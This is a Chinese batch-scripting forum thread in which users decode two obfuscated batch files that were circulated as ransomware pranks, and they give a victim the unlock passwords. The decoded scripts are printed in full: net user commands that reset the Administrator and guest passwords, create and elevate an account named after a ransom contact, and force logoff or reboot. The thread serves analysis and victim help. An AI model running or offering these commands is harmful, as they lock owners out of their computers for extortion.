Board logo

标题: [其他] [已解决]这两种批处理怎么解密 [打印本页]

作者: Blitz    时间: 2017-10-10 16:22     标题: [已解决]这两种批处理怎么解密

看过论坛里的帖子,知道文件头混淆加密的用copy nul+a.bat b.bat,用QBFC转成exe的用od设断点看路径,但是这两个批处理不会解。。。
上传附件了,注意!!!!!!这两个是别人发的敲竹杠,谨慎运行
作者: 0000    时间: 2017-10-10 19:59

看到名字就知道是病毒了
batgame.com ----- bat吧 (百度贴吧) 里的一个坑爹 病毒 作品
作者: 0000    时间: 2017-10-10 20:07

c:bat
  1. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
  2. net user Administrator zfw123
  3. net user 要密码加QQ1845016856 zfw123 /add
  4. Shutdown -L
  5. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
复制代码

作者: 老刘1号    时间: 2017-10-10 20:16

com文件直接rar打开
然而并没有加密,仅仅是混淆,73-75行为勒索代码
作者: Blitz    时间: 2017-10-10 20:22

回复 4# 老刘1号


    能不能详细说说
作者: 见与不见    时间: 2017-10-12 23:21

本帖最后由 见与不见 于 2017-10-12 23:56 编辑

xx.COM里面是upx壳的命令行程序,解密:
  1. ECHO OFF
  2. net user Administrator CNM5418
  3. net user guest CNM5418
  4. net user 要密码加QQ1982949259 CNM5418 /add
  5. net localgroup administrators 要密码加QQ1982949259 /add
  6. shutdown -f -r -t 0
复制代码
bat脚本上面有已经给你解密了。


解密方法(鼠标戳一下)
作者: Blitz    时间: 2017-10-13 13:04

回复 6# 见与不见


    谢谢你!
作者: 1055367558    时间: 2017-10-13 19:08

回复 1# Blitz


    能说下密码吗?手贱点开了
作者: 见与不见    时间: 2017-10-13 19:39

回复 8# 1055367558


    密码在回帖里面都有
作者: 见与不见    时间: 2017-10-13 19:41

回复 9# 见与不见


    zfw123   或  CNM5418




欢迎光临 批处理之家 (http://www.bathome.net/) Powered by Discuz! 7.2